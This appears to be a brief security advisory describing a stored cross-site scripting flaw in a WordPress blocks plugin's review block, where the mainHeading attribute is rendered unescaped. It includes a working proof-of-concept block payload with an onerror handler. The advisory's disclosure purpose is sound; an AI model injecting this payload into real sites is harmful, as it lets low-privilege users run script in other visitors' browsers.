Description The plugin does not properly escape its mainHeadings blocks’ attribute before appending it to the final rendered block, allowing contributors to conduct Stored XSS attacks.
As a contributor, put the following payload in a post while in Code Editor mode
<!-- wp:themeisle-blocks/review {"id":"wp-block-themeisle-blocks-review-b973b49a","title":"123","mainHeading":"img src=x onerror=alert(1) style=width:150px;","className":""} /-->
The XSS will be triggered when viewing/prevewing the post